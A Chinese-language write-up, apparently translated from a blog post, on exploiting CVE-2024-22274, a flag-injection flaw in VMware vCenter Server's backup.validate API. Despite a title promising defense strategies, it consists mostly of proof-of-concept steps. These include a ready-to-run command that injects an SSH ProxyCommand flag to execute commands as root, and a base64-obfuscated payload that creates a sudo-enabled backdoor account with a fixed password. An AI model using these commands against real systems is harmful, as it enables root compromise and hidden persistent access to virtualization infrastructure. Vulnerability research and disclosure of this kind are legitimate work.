利用 CVE-2024–22274：深入研究 VMware vCenter Server 漏洞和防御策略

CVE-2024–22274 是 VMware vCenter Server 版本 8.0.0.10200 中的一个严重漏洞，允许经过身份验证的远程代码执行。该漏洞特别严重，因为它可以被利用来获得目标系统的 root 访问权限。

环境

受影响的软件：VMware vCenter 8.0.0.10200

底层操作系统：Photon Linux

漏洞详情

该漏洞存在于 API 组件中：

com.vmware.appliance.recovery.backup.job.create

com.vmware.appliance.recovery.backup.validate

这些组件容易受到标志注入攻击。此类攻击可以将恶意标志注入到 API 执行的系统命令中，从而允许攻击者以 root 用户身份运行任意命令。

概念验证 (PoC) – 利用漏洞的步骤

• 登录 vCenter Server：使用 SSH 以具有“admin”角色的用户身份登录。

• 识别易受攻击的命令：利用 pspy 等工具来检查易受攻击的 API 组件执行的系统命令。

• 标志注入：使用 backup.validate 命令的 –username 字段注入恶意SSH标志。例如：

backup.validate --parts common --locationType SFTP --location nowhere --locationUser '-o ProxyCommand=;/bin/touch /tmp/root!!! 2>' --locationPassword

此命令创建一个由 root 用户拥有的文件 /tmp/root!!! ，演示以 root 权限执行命令的能力。

创建具有 Root 访问权限的新用户：利用该漏洞创建具有 SSH 访问权限和 root 权限的新用户：

backup.validate --parts common --locationType SFTP --location nowhere --locationUser '-o ProxyCommand=;/bin/bash -c "{echo,dXNlcmFkZCBtYWxaICYmIGVjaG8gLWUgIk1hbElzSGVyZTEjXG5NYWxJc0hlcmUxIyIgfCBwYXNzd2QgbWFsWiA7IHVzZXJtb2QgLXMgL2Jpbi9iYXNoIG1hbFogJiYgdXNlcm1vZCAtYUcgc3VkbyBtYWxaCg==}|{base64,-d}|bash" 2>' --locationPassword

上面的命令解码并执行一个 base64 编码的有效负载，该负载创建一个使用密码 MalIsHere1# 的新用户 malZ 并将该用户添加到 sudo 组中。

参考

GitHub pspy GitHub 上的 pspy

• https://github.com/DominicBreuker/pspy

CVE-2024–22274

• https://github.com/mbadanoiu/CVE-2024-22274

Exploiting CVE-2024–22274: A Deep Dive into VMware vCenter Server Vulnerabilities and Defense Strategieshttps://ikhaleelkhan.medium.com/exploiting-cve-2024-22274-a-deep-dive-into-vmware-vcenter-server-vulnerabilities-and-defense-5d79b44ed215